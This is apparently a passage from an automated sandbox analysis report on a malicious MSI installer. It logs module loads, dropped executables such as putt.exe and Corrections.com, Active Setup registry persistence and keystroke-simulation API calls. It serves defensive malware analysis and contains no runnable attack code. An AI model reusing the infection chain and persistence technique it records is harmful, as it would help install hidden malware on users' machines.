            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: comsvcs.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: shfolder.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: riched20.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: usp10.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: msls31.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
            Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: wsock32.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: napinsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: pnrpnsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: wshbth.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: nlaapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: winrnr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.comSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\Installer\MSI64FB.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\System32\msiexec.exe Automated click: Next >
            Source: C:\Windows\System32\msiexec.exe Automated click: Next >
            Source: C:\Windows\System32\msiexec.exe Automated click: Install
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Setup.msi Static file information: File size 2098688 > 1048576
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdbGCTL source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbC source: MSI64FB.tmp, 00000004.00000000.1886716411.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, MSI64FB.tmp, 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp, Setup.msi, MSI64FB.tmp.1.dr, MSI63A2.tmp.1.dr, 625ebf.msi.1.dr, 625ebe.rbs.1.dr, 625ebd.msi.1.dr
            Source: Binary string: cryptosetup.pdb source: Corrections.com, 0000001A.00000002.3006622611.0000000003AFF000.00000004.00000800.00020000.00000000.sdmp, QQ9RQQ.26.dr
            Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Setup.msi, MSIAE63.tmp.0.dr, MSIAF01.tmp.0.dr, MSI614E.tmp.1.dr, 625ebf.msi.1.dr, MSIAF50.tmp.0.dr, MSIAFB0.tmp.0.dr, MSI60C0.tmp.1.dr
            Source: C:\Users\user\AppData\Local\Temp\putt.exe Code function: 16_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_00406328
            Source: lem[1].exe.9.dr Static PE information: real checksum: 0xee8db should be: 0xefc4d
            Source: putt.exe.9.dr Static PE information: real checksum: 0xee8db should be: 0xefc4d
            Source: MSIAE63.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIAF01.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIAF50.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIAF80.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIAFB0.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIB1A5.tmp.0.dr Static PE information: section name: .fptable
            Source: MSIB1E4.tmp.0.dr Static PE information: section name: .fptable
            Source: MSI60C0.tmp.1.dr Static PE information: section name: .fptable
            Source: MSI614E.tmp.1.dr Static PE information: section name: .fptable
            Source: MSI619D.tmp.1.dr Static PE information: section name: .fptable
            Source: MSI64FB.tmp.1.dr Static PE information: section name: .fptable
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFD9B2CD2A5 pushad ; iretd 9_2_00007FFD9B2CD2A6
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00F60DE6 push ecx; ret 26_2_00F60DF9

            Persistence and Installation Behavior

            Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Local\Temp\runner.vbs
            Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\628056\Corrections.com
            Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSI64FB.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIB1E4.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI619D.tmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI614E.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAF01.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAE63.tmp
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\putt.exe
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI60C0.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAF50.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAFB0.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIB1A5.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIAF80.tmp
            Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI64FB.tmp
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com File created: C:\ProgramData\37QQIEKNGVAA\QQ9RQQ

            Boot Survival

            Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} StubPath
            Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{C1234A01-14E3-4FC1-94A4-06C00CB5F0E2} Version

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00FD26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,26_2_00FD26DD
            Source: C:\Users\user\AppData\Local\Temp\628056\Corrections.com Code function: 26_2_00F5FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,26_2_00F5FC7C
            Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
